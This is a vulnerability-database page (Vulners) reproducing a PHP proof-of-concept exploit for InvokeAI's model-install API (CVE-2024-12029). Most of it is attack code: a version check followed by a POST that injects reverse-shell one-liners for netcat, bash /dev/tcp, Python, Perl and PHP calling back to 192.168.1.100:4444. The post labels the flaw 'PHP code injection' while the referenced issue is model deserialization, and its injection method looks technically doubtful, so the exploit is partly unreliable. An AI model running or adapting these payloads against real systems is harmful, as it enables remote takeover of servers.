Vulners
Lucene search
InvokeAI 5.0 Code Injection
| Reporter | Title | Published | Views | Family All 19 |
|---|---|---|---|---|
 | InvokeAI Remote Code Execution Exploit | 20 Feb 202500:00 | – | zdt |
 | Exploit for CVE-2024-12029 | 15 Apr 202620:41 | – | githubexploit |
 | Remote Code Execution via Model Deserialization on /api/v2/models/install API | 9 Nov 202404:40 | – | huntr |
 | CVE-2024-12029 | 18 Feb 202513:08 | – | circl |
 | Invoke 安全漏洞 | 20 Mar 202500:00 | – | cnnvd |
 | CVE-2024-12029 | 20 Mar 202510:08 | – | cve |
 | CVE-2024-12029 Remote Code Execution via Model Deserialization in invoke-ai/invokeai | 20 Mar 202510:08 | – | cvelist |
 | InvokeAI Deserialization of Untrusted Data vulnerability | 21 Mar 202515:32 | – | github |
 | InvokeAI RCE | 18 Feb 202518:55 | – | metasploit |
 | CVE-2024-12029 | 20 Mar 202510:15 | – | nvd |
10
=============================================================================================================================================
| # Title : InvokeAI v5.0 PHP Code Injection Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://www.invoke.com/ |
=============================================================================================================================================
POC :
[+] Dorking İn Google Or Other Search Enggine.
[+] The code is a remote command execution (RCE) exploit that targets a vulnerability in InvokeAI,
which allows an attacker to execute commands via an insecure API that loads and runs models without validating their integrity.
[+] save code as poc.php .
[+] USage : cmd => c:\www\test\php poc.php 127.0.0.1 id
[+] SeT target = Line : 99
[+] PayLoad :
<?php
class InvokeAIExploit {
private $target;
private $port = 9090;
private $localPort = 8081;
private $httpDelay = 10;
private $payload;
public function __construct($target, $payload) {
$this->target = $target;
$this->payload = $payload;
}
private function sendRequest($method, $uri, $headers = [], $data = null) {
$url = "http://{$this->target}:{$this->port}/$uri";
$ch = curl_init($url);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);
curl_setopt($ch, CURLOPT_TIMEOUT, 10); // تحديد مهلة الطلب لتجنب الانتظار الطويل
if ($data) {
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($data));
}
$response = curl_exec($ch);
if (curl_errno($ch)) {
echo "cURL Error: " . curl_error($ch) . "\n";
}
curl_close($ch);
return $response;
}
public function checkVulnerability() {
echo "[" . date("H:i:s") . "] Checking target...\n";
$response = $this->sendRequest("GET", "api/v1/app/version");
$json = json_decode($response, true);
if (!$json || !isset($json['version'])) {
return "Unknown version";
}
$version = $json['version'];
if (version_compare($version, "4.0.0", ">=") && version_compare($version, "5.4.2", "<=")) {
return "Vulnerable version detected: $version";
}
return "Safe version: $version";
}
public function sendPayload() {
$maliciousModel = "http://{$this->target}:{$this->localPort}/" . bin2hex(random_bytes(4)) . ".ckpt";
// جميع الحمولات الممكنة للاتصال العكسي
$payloads = [
"nc -e /bin/sh 192.168.1.100 4444", // Netcat
"bash -i >& /dev/tcp/192.168.1.100/4444 0>&1", // Bash
"python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.100\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"])'", // Python3
"perl -e 'use Socket;$i=\"192.168.1.100\";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname(\"tcp\"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,\"&S\");open(STDOUT,\"&S\");open(STDERR,\"&S\");exec(\"/bin/sh -i\");};'", // Perl
"php -r '\$sock=fsockopen(\"192.168.1.100\",4444);exec(\"/bin/sh -i <&3 >&3 2>&3\");'", // PHP Reverse Shell
];
// دمج الحمولات ضمن `source` أو `headers`
$payloadCommand = implode(" ; ", $payloads);
$headers = [
"Content-Type: application/json",
"X-Exploit: {$payloadCommand}" // استغلال إذا كان التطبيق يستخدم الهيدر داخليًا
];
$data = [
"source" => "{$maliciousModel}; {$payloadCommand}",
"inplace" => "true"
];
echo "[+] Sending Reverse Shell Payloads...\n";
$response = $this->sendRequest("POST", "api/v2/models/install", $headers, $data);
return $response;
}
public function startExploit() {
$check = $this->checkVulnerability();
echo "$check\n";
if (strpos($check, "Vulnerable") === false) {
die("[" . date("H:i:s") . "] Target is not vulnerable.\n");
}
$result = $this->sendPayload();
echo "[" . date("H:i:s") . "] Response: $result\n";
}
}
// تنفيذ الاستغلال مع تمرير حمولة "id" لاختبار تنفيذ الأوامر
$exploit = new InvokeAIExploit("192.168.1.1", "id");
$exploit->startExploit();
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Mar 2025 00:00Current
8High risk
Vulners AI Score8
EPSS0.44157